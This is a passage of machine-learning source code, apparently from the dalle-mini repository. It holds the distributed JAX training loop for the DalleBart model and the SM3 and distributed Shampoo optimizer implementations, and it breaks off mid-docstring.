get_opt_state_spec_and_shape(): # get opt_state shape without actual init opt_state_shape = {} for k, p in split_params(trainable_params_shape).items(): if "scanned" not in k: opt_state_shape[k] = jax.eval_shape(optimizer[k].init, p) else: opt_state_shape[k] = jax.eval_shape(jax.vmap(optimizer[k].init), p) if training_args.optim == "adafactor": # factorized state must be replicated (rank different than params) opt_state_spec = {k: None for k in split_params(trainable_params_shape)} elif training_args.optim in ["adam", "distributed_shampoo"]: def _opt_state_spec_per_leaf(x, spec): if isinstance(x, FrozenDict): # variables with same structure as params return spec else: # other variables such as count return None split_spec = split_params(set_partitions(trainable_params_shape, False)) opt_state_spec = {} for k, p in split_params(trainable_params_shape).items(): if "scanned" in k: p = jax.eval_shape( lambda x: jax.tree_util.tree_map(lambda y: y[0], x), p ) if training_args.optim == "adam": opt_state_spec[k] = jax.tree_util.tree_map( partial(_opt_state_spec_per_leaf, spec=split_spec[k]), opt_state_shape[k], # return None spec for empty elements is_leaf=lambda x: isinstance(x, (FrozenDict, optax.EmptyState)), ) elif training_args.optim == "distributed_shampoo": opt_state_spec[k] = opt_fn[k].pspec_fn( p, split_spec[k], statistics_partition_spec, ) # add dimension for scanned params if "scanned" in k: opt_state_spec[k] = jax.tree_util.tree_map( lambda x: PartitionSpec(*(None,) + x) if x is not None else None, opt_state_spec[k], is_leaf=lambda x: isinstance(x, PartitionSpec), ) else: raise NotImplementedError return freeze(opt_state_spec), freeze(opt_state_shape) opt_state_spec, opt_state_shape = get_opt_state_spec_and_shape() # create a mesh mesh_shape = (training_args.dp_devices, training_args.mp_devices) devices = np.asarray(jax.devices()).reshape(*mesh_shape) mesh = maps.Mesh(devices, ("dp", "mp")) logger.info(f" Mesh shape: {mesh_shape}") # define TrainState class TrainState(struct.PyTreeNode): step: int params: core.FrozenDict[str, Any] opt_state: optax.OptState apply_fn: Callable = struct.field(pytree_node=False) tx: optax.GradientTransformation = struct.field(pytree_node=False) dropout_rng: jnp.ndarray = None epoch: int = 0 train_time: float = 0.0 # total time the model trained train_samples: int = 0 # number of samples seen def apply_gradients(self, *, grads, **kwargs): grads = split_params(trainable_params(grads, training_args.embeddings_only)) params = split_params( trainable_params(self.params, training_args.embeddings_only) ) opt_state = {} # we loop over keys: "standard", "scanned_encoder", "scanned_decoder" for k, param in params.items(): update_fn = self.tx[k].update if "scanned" in k: update_fn = jax.vmap(update_fn, in_axes=(0, 0, 0), out_axes=(0, 0)) updates, new_opt_state = update_fn(grads[k], self.opt_state[k], param) params[k] = optax.apply_updates(param, updates) opt_state[k] = new_opt_state params = unsplit_params(params) # merge with non-trainable params params, new_params = traverse_util.flatten_dict( unfreeze(self.params) ), traverse_util.flatten_dict(unfreeze(params)) params.update(new_params) params = freeze(traverse_util.unflatten_dict(params)) return self.replace( step=self.step + 1, params=params, opt_state=freeze(opt_state), **kwargs, ) @classmethod def create(cls, *, apply_fn, params, tx, **kwargs): opt_state = {} for k, p in split_params( trainable_params(params, training_args.embeddings_only) ).items(): init_fn = tx[k].init if "scanned" in k: init_fn = jax.vmap(init_fn) opt_state[k] = init_fn(p) return cls( step=0, apply_fn=apply_fn, params=params, tx=tx, opt_state=freeze(opt_state), **kwargs, ) # define state spec state_spec = TrainState( params=param_spec, opt_state=opt_state_spec, dropout_rng=None, step=None, epoch=None, train_time=None, train_samples=None, apply_fn=model.__call__, tx=optimizer, ) # init params if not available yet def maybe_init_params(params): if params is not None: # model params are correctly loaded return params else: # params have not been initialized yet return model.init_weights(model.key, model.input_shape) with mesh: logger.info(" Creating state") # restore metadata attr_state = {} keys = ["train_time", "train_samples"] if model_args.restore_state: keys += ["step", "epoch"] attr_state = {k: v for k, v in model_metadata.items() if k in keys} if not model_args.restore_state: def init_state(params): return TrainState.create( apply_fn=model.__call__, tx=optimizer, params=maybe_init_params(params), dropout_rng=dropout_rng, **attr_state, ) state = pjit( init_state, in_axis_resources=(param_spec,) if model_args.model_name_or_path else None, out_axis_resources=state_spec, donate_argnums=(0,), )(params) else: # load opt_state opt_state = from_bytes(opt_state_shape, model_args.get_opt_state()) def restore_state(params, opt_state): return TrainState( apply_fn=model.__call__, tx=optimizer, params=params, opt_state=opt_state, dropout_rng=dropout_rng, **attr_state, ) state = pjit( restore_state, in_axis_resources=( param_spec, opt_state_spec, ), out_axis_resources=state_spec, donate_argnums=(0, 1), )(params, opt_state) # remove opt_state from CPU del opt_state # free CPU memory del params, opt_state_spec, opt_state_shape # define batch specs batch_spec = PartitionSpec("dp") grad_batch_spec = PartitionSpec(None, "dp") # define loss def loss_fn(logits, labels): loss = optax.softmax_cross_entropy(logits, onehot(labels, logits.shape[-1])) loss = loss.mean() return loss # "vmap trick" avoids a crash when mp_devices > 1 (not sure why it happens) # lead to better perf: see https://wandb.ai/dalle-mini/dalle-mini/reports/JAX-pmap-vs-pjit--VmlldzoxNDg1ODA2 use_vmap_trick = training_args.use_vmap_trick # make grad_param_spec for vmap if use_vmap_trick: grad_param_spec = jax.tree_util.tree_map( lambda x: PartitionSpec(*("dp",) + (x if x is not None else (None,))), param_spec, ) # Define gradient update step fn def train_step(state, batch, train_time): # get a minibatch (one gradient accumulation slice) def get_minibatch(batch, grad_idx): return jax.tree_util.tree_map( lambda x: jax.lax.dynamic_index_in_dim(x, grad_idx, keepdims=False), batch, ) def compute_loss(params, minibatch, dropout_rng): # minibatch has dim (batch_size, ...) minibatch, labels = minibatch.pop("labels") logits = state.apply_fn( **minibatch, params=params, dropout_rng=dropout_rng, train=True )[0] return loss_fn(logits, labels) grad_fn = jax.value_and_grad(compute_loss) def loss_and_grad(grad_idx, dropout_rng): # minibatch at grad_idx for gradient accumulation (None otherwise) minibatch = ( get_minibatch(batch, grad_idx) if grad_idx is not None else batch ) # ensure it is sharded properly minibatch = with_sharding_constraint(minibatch, batch_spec) # only 1 single rng per grad step, let us handle larger batch size (not sure why) dropout_rng, _ = jax.random.split(dropout_rng) if use_vmap_trick: # "vmap trick", calculate loss and grads independently per dp_device loss, grads = jax.vmap( grad_fn, in_axes=(None, 0, None), out_axes=(0, 0) )(state.params, minibatch, dropout_rng) # ensure they are sharded correctly loss = with_sharding_constraint(loss, batch_spec) grads = with_sharding_constraint(grads, grad_param_spec) # average across all devices # Note: we could average per device only after gradient accumulation, right before params update loss, grads = jax.tree_util.tree_map( lambda x: jnp.mean(x, axis=0), (loss, grads) ) else: # "vmap trick" does not work in multi-hosts and requires too much hbm loss, grads = grad_fn(state.params, minibatch, dropout_rng) # ensure grads are sharded grads = with_sharding_constraint(grads, param_spec) # return loss and grads return loss, grads, dropout_rng if training_args.gradient_accumulation_steps == 1: loss, grads, dropout_rng = loss_and_grad(None, state.dropout_rng) else: # create initial state for cumul_minibatch_step loop init_minibatch_step = ( 0.0, with_sharding_constraint( jax.tree_util.tree_map(jnp.zeros_like, state.params), param_spec ), state.dropout_rng, ) # accumulate gradients def cumul_minibatch_step(grad_idx, cumul_loss_grad_dropout): cumul_loss, cumul_grads, dropout_rng = cumul_loss_grad_dropout loss, grads, dropout_rng = loss_and_grad(grad_idx, dropout_rng) cumul_loss, cumul_grads = jax.tree_util.tree_map( jnp.add, (cumul_loss, cumul_grads), (loss, grads) ) cumul_grads = with_sharding_constraint(cumul_grads, param_spec) return cumul_loss, cumul_grads, dropout_rng # loop over gradients loss, grads, dropout_rng = jax.lax.fori_loop( 0, training_args.gradient_accumulation_steps, cumul_minibatch_step, init_minibatch_step, ) grads = with_sharding_constraint(grads, param_spec) # sum -> mean loss, grads = jax.tree_util.tree_map( lambda x: x / training_args.gradient_accumulation_steps, (loss, grads) ) grads = with_sharding_constraint(grads, param_spec) # update state state = state.apply_gradients( grads=grads, dropout_rng=dropout_rng, train_time=train_time, train_samples=state.train_samples + batch_size_per_step, ) metrics = { "loss": loss, "learning_rate": learning_rate_fn(state.step), } def maybe_fn(fn, val, zeros, freq): """Call fn only if it is a logging step""" return jax.lax.cond( state.step % freq == 0, fn, lambda _: zeros, val, ) # log additional metrics params = trainable_params(state.params, training_args.embeddings_only) grads = trainable_params(grads, training_args.embeddings_only) if training_args.log_norm_steps: zeros_norm = jax.tree_util.tree_map(lambda _: jnp.float32(0), params) def norm(val): return jax.tree_util.tree_map(lambda x: jnp.linalg.norm(x), val) gradients_norm = maybe_fn( norm, grads, zeros_norm, training_args.log_norm_steps ) params_norm = maybe_fn( norm, params, zeros_norm, training_args.log_norm_steps ) metrics.update( { "gradients_norm": gradients_norm, "params_norm": params_norm, } ) if training_args.log_histogram_steps: zeros_hist = jax.tree_util.tree_map( lambda _: jnp.histogram(jnp.zeros(1), density=True), params ) def histogram(val): return jax.tree_util.tree_map( lambda x: jnp.histogram(x, density=True), val ) gradients_hist = maybe_fn( histogram, grads, zeros_hist, training_args.log_histogram_steps ) params_hist = maybe_fn( histogram, params, zeros_hist, training_args.log_histogram_steps ) metrics.update( { "params_hist": params_hist, "gradients_hist": gradients_hist, } ) return state, metrics # Define eval fn eval_model = ( model if model_args.dtype == "float32" else DalleBart( model.config, seed=training_args.seed_model, dtype=jnp.float32, _do_init=False, ) ) def eval_step(state, batch): def compute_eval_loss(batch): batch, labels = batch.pop("labels") logits = eval_model(**batch, params=state.params, train=False)[0] return loss_fn(logits, labels) if use_vmap_trick: loss = jax.vmap(compute_eval_loss)(batch) # ensure they are sharded correctly loss = with_sharding_constraint(loss, batch_spec) # average across all devices loss = jnp.mean(loss) else: loss = compute_eval_loss(batch) return loss # Create parallel version of the train and eval step p_train_step = pjit( train_step, in_axis_resources=( state_spec, grad_batch_spec if training_args.gradient_accumulation_steps > 1 else batch_spec, None, ), out_axis_resources=(state_spec, None), donate_argnums=(0,), ) p_eval_step = pjit( eval_step, in_axis_resources=(state_spec, batch_spec), out_axis_resources=None, ) # define metrics logger class MetricsLogger: def __init__(self, step): # keep state self.state_dict = {} # estimate speed self.step = step self.time = time.perf_counter() self.offset_time = 0.0 def update_state_metrics(self, state): """Update internal state metrics (logged at each call to be used as x-axis)""" self.state_dict = { f'train/{k.split("_")[-1]}': state[k] for k in ["step", "epoch", "train_time", "train_samples"] } # timing metrics new_step = int(state["step"]) new_time = time.perf_counter() if new_step > self.step: # remove time for eval & save delta_time = new_time - self.time - self.offset_time self.offset_time = 0 time_per_step = delta_time / (new_step - self.step) self.step = new_step self.time = new_time self.log_time("train_per_step", time_per_step, offset=False) self.log_time("train_per_log", delta_time, offset=False) def log_time(self, key, duration, offset=True): if jax.process_index() == 0: wandb.log({f"time/{key}": duration, **self.state_dict}) if offset: self.offset_time += duration def log(self, metrics, prefix=None): if jax.process_index() == 0: log_metrics = {} for k, v in metrics.items(): if "_norm" in k: if self.step % training_args.log_norm_steps == 0: log_metrics[f"{k}/"] = unfreeze(v) elif "_hist" in k: if self.step % training_args.log_histogram_steps == 0: v = jax.tree_util.tree_map( lambda x: jax.device_get(x), unfreeze(v) ) v = jax.tree_util.tree_map( lambda x: wandb.Histogram(np_histogram=x), v, is_leaf=lambda x: isinstance(x, tuple), ) log_metrics[f"{k}/"] = v else: if prefix is not None: k = f"{prefix}/{k}" log_metrics[k] = v wandb.log({**log_metrics, **self.state_dict}) # keep local copy of state local_state = { k: jax.device_get(getattr(state, k)).item() for k in ["step", "epoch", "train_time", "train_samples"] } # init variables start_time = time.perf_counter() - local_state["train_time"] train_metrics = None evaluation_ran = False save_model_ran = False metrics_logger = MetricsLogger(local_state["step"]) epochs = tqdm( range(local_state["epoch"], num_epochs), desc=f"Epoch ... (1/{num_epochs})", position=0, disable=jax.process_index() > 0, ) def run_evaluation(): # ======================== Evaluating ============================== if training_args.do_eval: start_eval_time = time.perf_counter() # get validation datasets val_datasets = list( dataset.other_eval_datasets.keys() if hasattr(dataset, "other_eval_datasets") else [] ) val_datasets += ["eval"] for val_dataset in val_datasets: eval_loader = dataset.dataloader( val_dataset, eval_batch_size_per_step * max(1, training_args.mp_devices // jax.local_device_count()), ) eval_steps = ( len_eval_dataset // eval_batch_size_per_step if len_eval_dataset is not None else None ) eval_loss = [] for batch in tqdm( eval_loader, desc="Evaluating...", position=2, leave=False, total=eval_steps, disable=jax.process_index() > 0, ): # need to keep only eval_batch_size_per_node items relevant to the node batch = jax.tree_util.tree_map( lambda x: x.reshape( (jax.process_count(), eval_batch_size_per_node) + x.shape[1:] ), batch, ) batch = jax.tree_util.tree_map( lambda x: x[jax.process_index()], batch ) # add dp dimension when using "vmap trick" if use_vmap_trick: bs_shape = ( jax.local_device_count() // training_args.mp_devices, training_args.per_device_eval_batch_size, ) batch = jax.tree_util.tree_map( lambda x: x.reshape(bs_shape + x.shape[1:]), batch ) # freeze batch to pass safely to jax transforms batch = freeze(batch) # accumulate losses async eval_loss.append(p_eval_step(state, batch)) # get the mean of the loss eval_loss = jnp.stack(eval_loss) eval_loss = jnp.mean(eval_loss) eval_metrics = {"loss": eval_loss} # log metrics metrics_logger.log(eval_metrics, prefix=val_dataset) # Print metrics and update progress bar desc = f"Epoch... ({epoch + 1}/{num_epochs} | {val_dataset} Loss: {eval_metrics['loss']})" epochs.write(desc) epochs.desc = desc # log time metrics_logger.log_time("eval", time.perf_counter() - start_eval_time) return eval_metrics def run_save_model(state, eval_metrics=None): if jax.process_index() == 0: start_save_time = time.perf_counter() output_dir = training_args.output_dir use_bucket = output_dir.startswith("gs://") if use_bucket: bucket_path = Path(output_dir[5:]) / wandb.run.id / f"step_{state.step}" bucket, dir_path = str(bucket_path).split("/", 1) tmp_dir = tempfile.TemporaryDirectory() output_dir = tmp_dir.name # save model params = jax.device_get(state.params) model.save_pretrained( output_dir, params=params, ) # save tokenizer tokenizer.save_pretrained(output_dir) # copy to bucket if use_bucket: client = storage.Client() bucket = client.bucket(bucket) for filename in Path(output_dir).glob("*"): blob_name = str(Path(dir_path) / "model" / filename.name) blob = bucket.blob(blob_name) blob.upload_from_filename(str(filename)) tmp_dir.cleanup() # save state opt_state = jax.device_get(state.opt_state) if use_bucket: blob_name = str(Path(dir_path) / "state" / "opt_state.msgpack") blob = bucket.blob(blob_name) blob.upload_from_file(io.BytesIO(to_bytes(opt_state))) else: with (Path(output_dir) / "opt_state.msgpack").open("wb") as f: f.write(to_bytes(opt_state)) # save to W&B if training_args.log_model: # save some space c = wandb.wandb_sdk.wandb_artifacts.get_artifacts_cache() c.cleanup(wandb.util.from_human_size("20GB")) metadata = { k: jax.device_get(getattr(state, k)).item() for k in ["step", "epoch", "train_time", "train_samples"] } metadata["num_params"] = num_params if eval_metrics is not None: metadata["eval"] = eval_metrics # create model artifact if use_bucket: metadata["bucket_path"] = f"gs://{bucket_path}/model" artifact = wandb.Artifact( name=f"model-{wandb.run.id}", type="DalleBart_model", metadata=metadata, ) if use_bucket: artifact.add_reference(metadata["bucket_path"]) else: for filename in [ "config.json", "flax_model.msgpack", "merges.txt", "special_tokens_map.json", "tokenizer.json", "tokenizer_config.json", "vocab.json", ]: artifact.add_file( f"{Path(training_args.output_dir) / filename}" ) wandb.run.log_artifact(artifact) # create state artifact if use_bucket: metadata["bucket_path"] = f"gs://{bucket_path}/state" artifact_state = wandb.Artifact( name=f"state-{wandb.run.id}", type="DalleBart_state", metadata=metadata, ) if use_bucket: artifact_state.add_reference(metadata["bucket_path"]) else: artifact_state.add_file( f"{Path(training_args.output_dir) / 'opt_state.msgpack'}" ) wandb.run.log_artifact(artifact_state) metrics_logger.log_time("save_model", time.perf_counter() - start_save_time) logger.info(" Ready to start training") with mesh: for epoch in epochs: state = state.replace(epoch=epoch) local_state["epoch"] = epoch # ======================== Training ================================ metrics_logger.update_state_metrics(local_state) metrics_logger.log({}) if training_args.do_train: # load data - may be replicated on multiple nodes node_groups = max( 1, training_args.mp_devices // jax.local_device_count() ) loader_bs = batch_size_per_node * node_groups train_loader = dataset.dataloader( "train", loader_bs, epoch, ) # train for batch in tqdm( train_loader, desc="Training...", position=1, leave=False, total=steps_per_epoch, disable=jax.process_index() > 0, ): # calculate delta time (we have a lag of one step but it's ok) train_time = time.perf_counter() - start_time # reset control variables evaluation_ran = False save_model_ran = False # set correct shape to batch # - add grad_step dim if gradient_accumulation_steps > 1 bs_shape = ( (batch_size_per_node_per_grad_step * node_groups,) if not use_vmap_trick else ( jax.local_device_count() * node_groups // training_args.mp_devices, # local dp devices training_args.per_device_train_batch_size, ) ) if training_args.gradient_accumulation_steps > 1: # reshape data into (gradient_accumulation_steps, batch_per_node, ...) # to avoid any data redistribution when sharding bs_shape = ( training_args.gradient_accumulation_steps, ) + bs_shape # reshape batch batch = jax.tree_util.tree_map( lambda x: x.reshape(bs_shape + x.shape[1:]), batch, ) # freeze batch to pass safely to jax transforms batch = freeze(batch) # train step state, train_metrics = p_train_step(state, batch, train_time) local_state["step"] += 1 local_state["train_time"] = train_time local_state["train_samples"] += batch_size_per_step if ( local_state["step"] % training_args.logging_steps == 0 and jax.process_index() == 0 ): metrics_logger.update_state_metrics(local_state) metrics_logger.log(train_metrics, prefix="train") eval_metrics = None if local_state["step"] % training_args.eval_steps == 0: eval_metrics = run_evaluation() evaluation_ran = True if local_state["step"] % training_args.save_steps == 0: run_save_model(state, eval_metrics) save_model_ran = True # log final train metrics if train_metrics is not None: metrics_logger.update_state_metrics(local_state) metrics_logger.log(train_metrics, prefix="train") epochs.write( f"Epoch... ({epoch + 1}/{num_epochs} | Loss: {train_metrics['loss']}, Learning Rate: {train_metrics['learning_rate']})" ) # Final evaluation at the end of each epoch if not evaluation_ran: eval_metrics = run_evaluation() # save checkpoint after each epoch if not save_model_ran: run_save_model(state, eval_metrics) if __name__ == "__main__": main() File: tools/train/scalable_shampoo/sm3.py # coding=utf-8 # Copyright 2022 The Google Research Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # An implementation of SM3 from: # # Memory-Efficient Adaptive Optimization, https://arxiv.org/pdf/1901.11150.pdf # Rohan Anil, Vineet Gupta, Tomer Koren, Yoram Singer # # Author: Rohan Anil (rohananil at google dot com) # """SM3 Implementation.""" import functools from typing import Any, NamedTuple import chex import jax import jax.numpy as jnp import optax from .quantization_utils import QuantizedValue class SM3State(NamedTuple): count: chex.Array stats: Any # Per parameter optimizer state used in data-parallel training. class ParameterStats(NamedTuple): """State associated to each parameter of the model being trained.""" diagonal_statistics: chex.Array # Accumulator for diagonal preconditioner diagonal_momentum: QuantizedValue # Momentum for the diagonal preconditioner def sm3( learning_rate, beta1=0.9, beta2=0.999, diagonal_epsilon=1e-10, normalize_grads=False ): """SM3 optimizer. Memory-Efficient Adaptive Optimization, Rohan Anil, Vineet Gupta, Tomer Koren, Yoram Singer https://arxiv.org/abs/1901.11150 Args: learning_rate: the step size used to update the parameters. beta1: momentum parameter. beta2: second moment averaging parameter. diagonal_epsilon: epsilon for sm3 normalize_grads: Whether to normalize grads. Author finds it useful when grads are high variance. Returns: a GradientTransformation. """ def _quantize_momentum(momentum_statistics): return QuantizedValue.from_float_value(momentum_statistics, jnp.int8) def init_fn(params): """Initialise the optimiser's state.""" def _init(param): accumulators = [jnp.zeros([s]) for s in param.shape] momentum = _quantize_momentum(jnp.zeros_like(param)) return ParameterStats(accumulators, momentum) return SM3State( count=jnp.zeros([], jnp.int32), stats=jax.tree_map(_init, params) ) def _get_expanded_shape(shape, i): rank = len(shape) # Replaces a `shape` of [M, N, K] with 1 in all dimensions except for i. # For eg: i = 1 returns [1, N, 1]. return [1] * i + [shape[i]] + [1] * (rank - i - 1) def _moving_averages(grad, accumulators): w = (1.0 - beta2) if beta2 != 1.0 else 1.0 if grad.ndim < 2: return beta2 * accumulators[0] + w * grad**2 else: min_accumulator = functools.reduce(jnp.minimum, accumulators) return beta2 * min_accumulator + w * grad**2 def _moving_averages_momentum(grad, momentum): w = (1.0 - beta1) if beta1 != 1.0 else 1.0 return beta1 * momentum.to_float() + w * grad def _sketch_diagonal_statistics(grad, updated_diagonal_statistics): all_diagonal_statistics = [] for i in range(grad.ndim): axes = list(range(i)) + list(range(i + 1, grad.ndim)) dim_diagonal_statistics = jnp.max(updated_diagonal_statistics, axis=axes) all_diagonal_statistics.append(dim_diagonal_statistics) if grad.ndim == 1: all_diagonal_statistics[0] = updated_diagonal_statistics return all_diagonal_statistics def update_fn(updates, state, params=None): del params stats = state.stats if normalize_grads: updates = jax.tree_map(lambda g: g / (jnp.linalg.norm(g) + 1e-16), updates) # Reshape all vectors into N-d tensors to compute min over them. # [n], [m] -> [n, 1], [1, m] expanded_diagonal_statistics = jax.tree_map( lambda grad, state: [ # pylint:disable=g-long-lambda jnp.reshape( state.diagonal_statistics[i], _get_expanded_shape(grad.shape, i) ) for i in range(grad.ndim) ], updates, stats, ) # Compute new diagonal statistics new_diagonal_statistics = jax.tree_map( _moving_averages, updates, expanded_diagonal_statistics ) # Compute preconditioners (1/sqrt(s)) where s is the statistics. new_preconditioners = jax.tree_map( lambda t: 1.0 / jnp.sqrt(t + diagonal_epsilon), new_diagonal_statistics ) preconditioned_grads = jax.tree_map( lambda g, p: g * p, updates, new_preconditioners ) # Compute updated momentum (also handle quantization) updated_momentum = jax.tree_map( lambda preconditioned_grad, state: _moving_averages_momentum( # pylint:disable=g-long-lambda preconditioned_grad, state.diagonal_momentum ), preconditioned_grads, stats, ) # Update diagonal statistics. updated_diagonal_statistics = jax.tree_map( _sketch_diagonal_statistics, updates, new_diagonal_statistics ) # Update momentum. new_sm3_stats = jax.tree_map( lambda momentum, diagonal_stats: ParameterStats( # pylint:disable=g-long-lambda diagonal_stats, _quantize_momentum(momentum) ), updated_momentum, updated_diagonal_statistics, ) lr = learning_rate if callable(learning_rate): lr = learning_rate(state.count) new_updates = jax.tree_map(lambda pg: -lr * pg, updated_momentum) return new_updates, SM3State(count=state.count + 1, stats=new_sm3_stats) return optax.GradientTransformation(init_fn, update_fn) File: tools/train/scalable_shampoo/distributed_shampoo.py # coding=utf-8 # Copyright 2022 The Google Research Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # An implementation of distributed Shampoo optimizer from: # # Scalable Second Order Optimization for Deep Learning # Rohan Anil, Vineet Gupta, Tomer Koren, Kevin Regan, Yoram Singer # Preprint Paper: https://arxiv.org/abs/2002.09018 # # This implementation moves computation of inverse pth root back to the # accelerator (if higher precision is available). # # Authors: Rohan Anil (rohananil at google dot com) # Vineet Gupta (vineet at google dot com) # James Lottes (jlottes at google dot com) # Anudhyan Boral (anudhyan at google dot com) # """Distributed Shampoo Implementation.""" import enum import functools import itertools from typing import Any, Callable, List, NamedTuple, Optional, Tuple, Union import chex import jax import jax.numpy as jnp import numpy as np import optax from absl import logging from flax import struct from jax import lax from jax.experimental import pjit from jax.experimental.sparse import linalg from .quantization_utils import QuantizedValue from .symmetric_matrices import symmetric_matrices # Dtype for inverse-pth root routine # Switch to f64 if you have hardware that supports it. Enable the jax flag # jax_enable_x64 for this to work, otherwise it will default to float32. _MAT_INV_PTH_ROOT_DTYPE = jnp.float64 @struct.dataclass class TrainingMetrics: inverse_pth_root_errors: chex.Array # Error for inverse-pth roots. # TODO(rohananil): Add more important metrics to track during training. # Per parameter optimizer state used in data-parallel training. class ParameterStats(NamedTuple): """State associated to each parameter of the model being trained.""" diagonal_statistics: QuantizedValue # Accumulator for diagonal preconditioner statistics: List[Any] # Statistics (QuantizedValue, chex.Array) preconditioners: List[Any] # Preconditioners (QuantizedValue, chex.Array) diagonal_momentum: QuantizedValue # Momentum for the diagonal preconditioner momentum: QuantizedValue # Momentum for the shampoo preconditioner training_metrics: TrainingMetrics # Metrics (optional for training). # For training extremely large model; We keep a global state with a concatenated # statistics and preconditioner states for all vars. This is so that we can # annotate the leading axis to be sharded to save memory at the cost of # communication. @struct.dataclass class GlobalShardedParameterStats: statistics: chex.Array # Statistics preconditioners: chex.Array # Preconditioners exponents: chex.Array # exponents # These are per-parameter local states; All statistics here mirror the parameter # Thus the sharding is copied over from the param specification. @struct.dataclass class LocalShardedParameterStats: """State associated to each parameter of the model being trained.""" diagonal_statistics: QuantizedValue # Accumulator for diagonal preconditioner diagonal_momentum: QuantizedValue # Momentum for the diagonal preconditioner momentum: QuantizedValue # Momentum for the shampoo preconditioner training_metrics: TrainingMetrics # Metrics (optional for training). index_start: np.int32 = struct.field( pytree_node=False ) # Index into global statistics array sizes: Any = struct.field(pytree_node=False) # Sizes of the statistics. def init_training_metrics(num_statistics): # Since the downstream apis expect a jnp.array - we create a dummy one if # num_statistics=0. if not num_statistics: return TrainingMetrics(jnp.array(0, jnp.float32)) else: return TrainingMetrics(jnp.zeros([num_statistics], jnp.float32)) def init_training_metrics_shapes(num_statistics): # Since the downstream apis expect a jnp.array - we create a dummy one if # num_statistics=0. if not num_statistics: return TrainingMetrics([[], jnp.float32]) else: return TrainingMetrics([[num_statistics], jnp.float32]) def init_training_metrics_pspec(): return TrainingMetrics(pjit.PartitionSpec()) class ShardedShampooStats(NamedTuple): """Shampoo state in sharded mode.""" global_stats: Any local_stats: Any class ShampooState(NamedTuple): count: chex.Array stats: Any class InitFnState(NamedTuple): init_fn: Any pspec_fn: Any shape_and_dtype_fn: Any class GraftingType(enum.IntEnum): SGD = 1 ADAGRAD = 2 RMSPROP = 3 RMSPROP_NORMALIZED = 4 SQRT_N = 5 ADAGRAD_NORMALIZED = 6 class PreconditionerType(enum.IntEnum): # Default, computes preconditioner for each dim ALL = 1 # One sided Shampoo, in this cases only on input dim. # Assumes last dim is always the output dim and everything else input dim. INPUT = 2 def power_iteration( matrix, num_iters=100, error_tolerance=1e-6, precision=lax.Precision.HIGHEST, ): r"""Power iteration algorithm. The power iteration algorithm takes a symmetric PSD matrix `A`, and produces a scalar `\lambda` , which is the greatest (in absolute value) eigenvalue of `A`, and a vector v, which is the corresponding eigenvector of `A`. References: [Wikipedia, 2021](https://en.wikipedia.org/wiki/Power_iteration) Args: matrix: the symmetric PSD matrix. num_iters: Number of iterations. error_tolerance: Iterative exit condition. precision: precision XLA related flag, the available options are: a) lax.Precision.DEFAULT (better step time, but not precise) b) lax.Precision.HIGH (increased precision, slower) c) lax.Precision.HIGHEST (best possible precision, slowest) Returns: eigen vector, eigen value """ matrix_size = matrix.shape[-1] def _iter_condition(state): i, unused_v, unused_s, unused_s_v, run_step = state return jnp.logical_and(i < num_iters, run_step) def _iter_body(state): """One step of power iteration.""" i, new_v, s, s_v, unused_run_step = state new_v = new_v / jnp.linalg.norm(new_v) s_v = jnp.einsum("ij,j->i", matrix, new_v, precision=precision) s_new = jnp.einsum("i,i->", new_v, s_v, precision=precision) return ( i + 1, s_v, s_new, s_v, jnp.greater(jnp.abs(s_new - s), error_tolerance), ) # Figure out how to use step as seed for random. v_0 = ( np.random.RandomState(1729).uniform(-1.0, 1.0, matrix_size).astype(matrix.dtype) ) init_state = tuple([0, v_0, jnp.zeros([], dtype=matrix.dtype), v_0, True]) _, v_out, s_out, _, _ = lax.while_loop(_iter_condition, _iter_body, init_state) v_out = v_out / jnp.linalg.norm(v_out) return v_out, s_out def mat_power( mat_m, p, precision=lax.Precision.HIGHEST, ): """A simple matrix power method. M^p where p can be TracedValue.""" power = jnp.eye(mat_m.shape[0], dtype=_MAT_INV_PTH_ROOT_DTYPE) def _iter_condition(state): i, _, _ = state return i > 0 def _iter_body(state): i, power, mat = state power = jax.lax.cond( i % 2 == 1, lambda: jnp.matmul(mat, power, precision=precision), lambda: power, ) i //= 2 mat = jnp.matmul(mat, mat, precision=precision) return i, power, mat _, result, _ = lax.while_loop(_iter_condition, _iter_body, (p, power, mat_m)) return result def _pth_root_difference(w, alpha, beta, p): """Computes (w+alpha)^(-1/p)-(w+beta)^(-1/p).""" a = w + alpha b = w + beta a_minus_b = alpha - beta exp = -1 / p def _stable_subtract(b, a_minus_b): # Mathematically identical to the target expression, with (w+beta)^(-1/p) # term factored out and w cancellation in the subtraction. return (b**exp) * jnp.expm1(exp * jnp.log1p(a_minus_b / b)) return jnp.where( # Choose the branch with the best log1p approximation. jnp.abs(a_minus_b / b) < jnp.abs(a_minus_b / a), -_stable_subtract(a, -a_minus_b), _stable_subtract(b, a_minus_b), ) def matrix_inverse_pth_root( matrix, p, num_iters=100, ridge_epsilon=1e-6, error_tolerance=1e-6, precision=lax.Precision.HIGHEST, relative_matrix_epsilon=True, lobpcg_topk_precondition=0, lobpcg_max_iter=0, ): """Computes `matrix^(-1/p)`, where `p` is a positive integer. This function uses the Coupled newton iterations algorithm for the computation of a matrix's inverse pth root. References: [Functions of Matrices, Theory and Computation, Nicholas J Higham, Pg 184, Eq 7.18]( https://epubs.siam.org/doi/book/10.1137/1.9780898717778) Args: matrix: the symmetric PSD matrix whose power it to be computed p: exponent, for p a positive integer. num_iters: Maximum number of iterations. ridge_epsilon: Ridge epsilon added to make the matrix positive definite. error_tolerance: Error indicator, useful for early termination. precision: precision XLA related flag, the available options are: a) lax.Precision.DEFAULT (better step time, but not precise) b) lax.Precision.HIGH (increased precision, slower) c) lax.Precision.HIGHEST (best possible precision, slowest) relative_matrix_epsilon: Whether to use relative epsilon to the max eigen value when computing inverse-pth root. lobpcg_topk_precondition: If nonzero, specifies the number of top eigenvectors to subtract out before performing LOBPCG. Note this makes relative_matrix_epsilon essentially free. lobpcg_max_iter: Maximum iteration count for LOBPCG, defaults to 